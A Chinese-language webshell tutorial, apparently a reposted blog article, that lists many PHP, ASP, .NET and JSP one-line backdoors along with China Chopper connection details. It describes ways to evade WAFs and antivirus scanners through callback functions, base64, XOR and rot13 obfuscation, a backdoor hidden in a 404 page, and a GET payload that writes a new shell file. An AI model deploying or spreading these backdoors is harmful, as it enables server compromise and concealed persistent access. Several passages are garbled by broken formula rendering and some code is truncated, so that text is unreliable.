webshell函数回调
目录
经典一句话
利用简单的拼接字符串
利用php回调函数等技巧绕过WAF的方法(姑且简称“回调后门”吧)
- 利用 array_filter+base64_decode
2.利用array_map+base64_decode
3.利用uasort+base64_decode
4.利用array_walk+preg_replace
5.利用array_walk_recursive+preg_replace
6.利用mb_ereg_replace
7.利用preg_filter
8.利用register_shutdown_function
9.利用register_tick_function
10.利用filter_var
强悍的PHP一句话后门
利用404页面隐藏PHP小马:
无特征隐藏PHP一句话:
超级隐蔽的PHP后门:
层级请求,编码运行PHP后门:
PHP后门生成工具weevely
三个变形的一句话PHP木马
第一个
第二个
第三个
最后列几个高级的PHP一句话木马后门:
经典一句话
PHP:
ASP: <%eval request(“pass”)%>
.NET: <%@ Page Language=“Jscript”%><%eval(Request.Item[“pass”],“unsafe”);%>
我们写一句话最终还是要拼接成经典的一句话的,当然,实现方式不止eval,还可以是assert,而且很多时候用菜刀连接的时候使用的是assert,具体原因见 从底层分析eval和assert的区别
利用简单的拼接字符串
用法: http://www.xxx.com/1.php
菜刀连接用法: http://www.xxx.com/1.php
密码:joker
详解: assert,是php代码执行函数,与eval()有同样的功能,应为 a r r a y [ ] , P O S T [ ] 都 是 数 组 , 所 以 a r r a y [ ] = a r r a y [ ] = P O S T , 就 是 把 P O S T 数 组 的 值 赋 给 P O S T 数 组 的 值 赋 给 a r r a y 数 组 , 这 样 的 话 array[],POST[]都是数组,所以array[]=array[]=POST,就是把POST数组的值赋给POST数组的值赋给array数组,这样的话 array[],POST[]都是数组,所以array[]=array[]=POST,就是把POST数组的值赋给POST数组的值赋给array数组,这样的话array[0][‘POST’]的输出就是assert,所以组成了一句话木马
assert($_POST[‘joker’]),直接用菜刀链接即可
用法: http://www.xxx.com/2.php
菜刀连接用法: http://www.xxx.com/2.php
密码:joker
详解: g 是 个 数 组 , g [ 1 ] = ′ s ′ , c h r ( ′ 116 ′ ) = ′ t ′ , ( h t t p s : / / b l o g . c s d n . n e t / y a b i n g s h i t e c h / a r t i c l e / d e t a i l s / 19833217 A S C l l 码 对 应 表 ) , 这 样 的 g [ 1 ] = ′ s ′ , c h r ( ′ 116 ′ ) = ′ t ′ , ( h t t p s : / / b l o g . c s d n . n e t / y a b i n g s h i t e c h / a r t i c l e / d e t a i l s / 19833217 A S C l l 码 对 应 表 ) , 这 样 的 g g = a s s e r t , @ g g ( g g ( P O S T [ j o k e r ] ) 不 就 是 a s s e r t ( g是个数组,g[1]=′s′,chr(′116′)=′t′,(https://blog.csdn.net/yabingshitech/article/details/19833217ASCll码对应表),这样的g[1]=′s′,chr(′116′)=′t′,(https://blog.csdn.net/yabingshitech/article/details/19833217ASCll码对应表),这样的gg=assert,@gg(gg(_POST[joker])不就是assert( g是个数组,g[1]=′s′,chr(′116′)=′t′,(https://blog.csdn.net/yabingshitech/article/details/19833217ASCll码对应表),这样的g[1]=′s′,chr(′116′)=′t′,(https://blog.csdn.net/yabingshitech/article/details/19833217ASCll码对应表),这样的gg=assert,@gg(gg(POST[joker])不就是assert(_POST[joker]),是我们常见的一句话木马,直接菜刀链接即可
利用php回调函数等技巧绕过WAF的方法(姑且简称“回调后门”吧)
-
利用 array_filter+base64_decode
用法:
http://www.xxx.com/settoken.php?e=YXNzZXJ0 (这里的“YXNzZXJ0 ”是assert用base64加密后的,因为源码用到了base64_decode)
浏览器提交POST:settoken=phpinfo();
菜刀连接用法:http://www.xxx.com/settoken.php?e=YXNzZXJ0
密码:settoken
补充:
array_filter()回调函数,原型为:
array array_filter ( array $array [, callable $callback [, int $flag = 0 ]] )
依次将 array 数组中的每个值传递到 callback 函数。如果 callback 函数返回 true,则 array 数组的当前值会被包含在返回的结果数组中。数组的键名保留不变。这样就构成了assert($_POST[‘POST’])这个经典一句话
2.利用array_map+base64_decode
类似上一个array_filter,都是php回调函数的利用
用法:同上一个
3.利用uasort+base64_decode
1, $_REQUEST['settoken'] => 2);
uksort($arr, $e);
?>
用法类似
再给出这两个函数,面向对象的方法:
// method 0
$arr = new ArrayObject(array(‘test’, $_REQUEST[‘pass’]));
$arr->uasort(‘assert’);
// method 1
$arr = new ArrayObject(array(‘test’ => 1, $_REQUEST[‘pass’] => 2));
$arr->uksort(‘assert’);
再来两个类似的回调后门:
$e = $_REQUEST[‘e’];
$arr = array(1);
$e = $_REQUEST[‘e’];
a r r = a r r a y ( arr = array( arr=array(_POST[‘pass’]);
a r r 2 = a r r a y ( 1 ) ; a r r a y u d i f f ( arr2 = array(1); array_udiff( arr2=array(1);arrayudiff(arr, $arr2, $e);
以上几个都是可以直接菜刀连接的一句话,但目标PHP版本在5.4.8及以上才可用.
php中,可以执行代码的函数:
1: 一个参数:assert
2: 两个参数:assert(php5.4.8+)
3: 三个参数:preg_replace /e模式
三个参数可以用preg_replace。所以我这里构造了一个array_walk+preg_replace的回调后门:
4.利用array_walk+preg_replace
'|.*|e',);
array_walk($arr, $e, '');
?>
用法:
http://www.xxx.com/settoken.php?e=preg_replace
浏览器提交POST:settoken=phpinfo();
菜刀连接用法:http://www.xxx.com/settoken.php?e=preg_replace
密码:settoken
这个后门可以在php5.3下使用.
5.利用array_walk_recursive+preg_replace
'|.*|e',);
array_walk_recursive($arr, $e, '');
?>
用法:
http://www.xxx.com/settoken.php?e=preg_replace
浏览器提交POST:settoken=phpinfo();
菜刀连接用法:http://www.xxx.com/settoken.php?e=preg_replace
密码:settoken
看了以上几个回调后门,发现preg_replace确实好用.但显然很多WAF和安全狗 DD盾什么的早就盯上这个函数了.其实php里不止这个函数可以执行eval的功能,还有几个类似的:
6.利用mb_ereg_replace
7.利用preg_filter
第六个 第七个的用法:
http://www.xxx.com/settoken.php?e=assert
浏览器提交POST:settoken=phpinfo();
菜刀连接用法:http://www.xxx.com/settoken.php?e=assert
密码:settoken
推荐这个单参数后门,在各个版本都比较好驾驭. 这里给出几个好用不杀的回调后门
8.利用register_shutdown_function
这个函数的官方文档点击这里
这个是php全版本支持的,且不报不杀稳定执行.
详解:register_shutdown_function()函数是来注册一个会在PHP中止时执行的函数,
PHP中止的情况有三种:
执行完成
exit/die导致的中止
发生致命错误中止
,这样的话等到php函数执行完成,就会调用我们传进去的php中止时执行的函数
构成 assert($_REQUEST[‘joker’]) ,一句话木马 ,直接用菜刀链接即可.
用法:
浏览器GET提交:http://www.xxx.com/settoken.php?e=assert&settoken=phpinfo();
即可执行phpinfo();
菜刀连接用法:http://www.xxx.com/settoken.php?e=assert
密码:settoken
9.利用register_tick_function
详解:register_tick_function函数必须要和declare流程控制机制合并使用,那么就先了解一下declare和tick:Tick 是一个在 declare 代码段中解释器每执行 N 条低级语句就会发生的事件。N 的值是在 declare 中的 directive 部分用 ticks=N 来指定的。在每个 tick 中出现的事件是由 register_tick_function() 来指定的。也就是说当ticks=1,每执行1行代码,就需要运行一次我们传过来的assert()函数,$_REQUEST[‘joker’]是参数
这样就构成了assert($_REQUEST[‘joker’]) ,直接用菜刀链接一句话木马即可
用法:
浏览器GET提交:http://www.xxx.com/settoken.php?e=assert&settoken=phpinfo();
即可执行phpinfo();
菜刀连接用法:http://www.xxx.com/settoken.php?e=assert
密码:settoken
10.利用filter_var
'assert'));
?>
filter_var函数介绍点击这里
用法:
浏览器GET提交:http://www.xxx.com/settoken.php?e=assert&settoken=phpinfo();
即可执行phpinfo();
菜刀连接用法:http://www.xxx.com/settoken.php?e=assert
密码:settoken
强悍的PHP一句话后门
转自
利用404页面隐藏PHP小马:
404 Not Found
Not Found
The requested URL was not found on this server.
404页面是网站常用的文件,一般创建好后很少有人会去对它进行检查修改,这时我们可以利用这一点进行隐藏后门。
无特征隐藏PHP一句话:
将POST[′code′]的内容赋值给POST[′code′]的内容赋值给_SESSION[‘theCode’],然后执行$_SESSION[‘theCode’],亮点是没有特征码。用扫描工具来检查代码的话,是不会报警的,达到目的了。
超级隐蔽的PHP后门:
仅用GET函数就构成了木马;
利用方法:
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
执行后当前目录生成c.php一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马,真可谓不可小视,简简单单的一句话,被延伸到这般应用。
层级请求,编码运行PHP后门:
文件2:
$url,
CURLOPT_HEADER => FALSE,
CURLOPT_RETURNTRANSFER => TRUE,
CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options);
echo curl_exec($ch);
?>
通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码,来达到后门的效果,一般waf对referer这些检测要松一点,或者没有检测。用这个思路bypass waf不错。
PHP后门生成工具weevely
weevely是一款针对PHP的webshell的自由软件,可用于模拟一个类似于telnet的连接shell,weevely通常用于web程序的漏洞利用,隐藏后门或者使用类似telnet的方式来代替web 页面式的管理,weevely生成的服务器端php代码是经过了base64编码的,所以可以骗过主流的杀毒软件和IDS,上传服务器端代码后通常可以通过weevely直接运行。
weevely所生成的PHP后门所使用的方法是现在比较主流的base64加密结合字符串变形技术,后门中所使用的函数均是常用的字符串处理函数,被作为检查规则的eval,system等函数都不会直接出现在代码中,从而可以致使后门文件绕过后门查找工具的检查。使用暗组的Web后门查杀工具进行扫描,结果显示该文件无任何威胁。
以上是大概介绍下边是截图,相关使用方法亦家就不在这介绍了,简单的科普一下。
那些强悍的PHP一句话后门
三个变形的一句话PHP木马
第一个
在菜刀里写 site/1.php?2=assert 密码是1
第二个
1、“^”为异或运算符。在PHP中,两个变量进行异或时,会将字符串转换成二进制再进行异或,异或完,又将结果从二进制转换成了字符串。
2、$++;这行代码的意思是对变量名为""的变量进行自增操作,在PHP中未定义的变量默认值为null,nullfalse0,可以在不使用任何数字的情况下,
通过对未定义变量的自增操作来得到一个数字。
3、$__=(""^"?").(":"^"}").("%"^"").("{"^"/");
("`"^"?") 01100000^00111111=01011111 —>”_”
(":"^"}") 00111010^01111101=01000111—>”G”
("%"^"`") 00100101^01100000=01000101—>”E”
("{"^"/") 01111011^ 00101111=01010100—>”T”
得到$__=_GET
4、KaTeX parse error: Expected group after '_' at position 1: _̲__=("""{").("~"".").("/""`").("-""~").("("^"|");
("$"^"{") 00100100^01111011=01011111—>”_”
("~"^".") 01111110^00101110=01010000—>”P”
("/"^"`") 00101111^01100000=01001111—>”O”
("-"^"~") 00101101^01111110=01010011—>”S”
("("^"|") 00101000^01111100=01010100—>”T”
得到$___=_POST
5、KaTeX parse error: Expected '}', got 'EOF' at end of input: {__}[! ] ( _]( ]({KaTeX parse error: Expected group after '_' at position 1: _̲__}[_]);
得到 G E T [ 0 ] ( _GET[0]( GET[0](_POST[1]);
6、构造一句话木马,将“0”当成参数,赋值为“assert”
7、使用菜刀工具连接,地址
http://ip/b.php?0=assert 密码为1
在菜刀里写 site/2.php?_=assert&__=eval($_POST[‘pass’]) 密码是pass。如果你用菜刀的附加数据的话更隐蔽,或者用其它注射工具也可以,因为是post提交的。
第三个
($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');
str_rot13(‘riny’)即编码后的eval,完全避开了关键字,又不失效果,让人吐血!
最后列几个高级的PHP一句话木马后门:
1、
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句话
2、
$filename=$_GET['xbid'];
include ($filename);
//危险的include函数,直接编译任何文件为php格式运行
3、
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
//重命名任何文件
4、
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句话
5、include ($uid);
//危险的include函数,直接编译任何文件为php格式运行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif
//gif插一句话
6、典型一句话
程序后门代码
程序代码
//容错代码
程序代码
//使用lanker一句话客户端的专家模式执行相关的php语句
程序代码
程序代码
程序代码
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
程序代码
h=@eval_r($_POST1);
程序代码
//绕过
<%Execute(request("a"))%>
%><%execute request("a")%><%
<%25Execute(request("a"))%25>
%><%execute request("yy")%>
<%execute request(char(97))%>
<%eval request(char(97))%>
":execute request("value"):a="
在数据库里插入的一句话木马
┼攠數畣整爠煥敵瑳∨∣┩愾
┼癥污爠煥敵瑳∨≡┩> 密码为: a
php一句话
aspx一句话
JSP一句话后门
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>